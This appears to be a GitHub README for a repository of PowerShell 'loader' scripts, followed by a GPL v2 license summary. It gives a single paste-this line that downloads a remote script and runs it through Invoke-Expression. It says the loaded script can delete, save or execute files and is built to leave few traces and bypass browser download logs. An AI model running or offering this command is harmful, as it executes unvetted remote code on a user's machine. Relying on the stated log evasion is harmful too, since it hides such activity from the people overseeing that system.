This repo contains powershell scripts to install software/scripts without saving logs from a browser and no exe file, sometimes refered to as a "loader"
No. We have moved on to using our own loader software and have updated these scripts for public information and usage
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression "& { $(Invoke-WebRequest -UseBasicParsing 'https://raw.githubusercontent.com/kamishirodev/scripts/main/client.ps1') }"Pasting this one line of code in Powershell will load the main script which can be of any length, in here you can do things such as: delete files, save files, load/execute files, or really anything that powershell can do. These are designed to leave only small traces that windows itself leaves behind and bypass browser download logs
Permissions
- ✔️ Commercial use
- ✔️ Modification
- ✔️ Distribution
- ✔️ Private use
Release conditions
- ❕ License and copyright notice
- ❕ State changes
- ❕ Disclose source
- ❕ Same license
Limitations
- ❌ Liability
- ❌ Warranty
License being used: GNU General Public License v2.0 license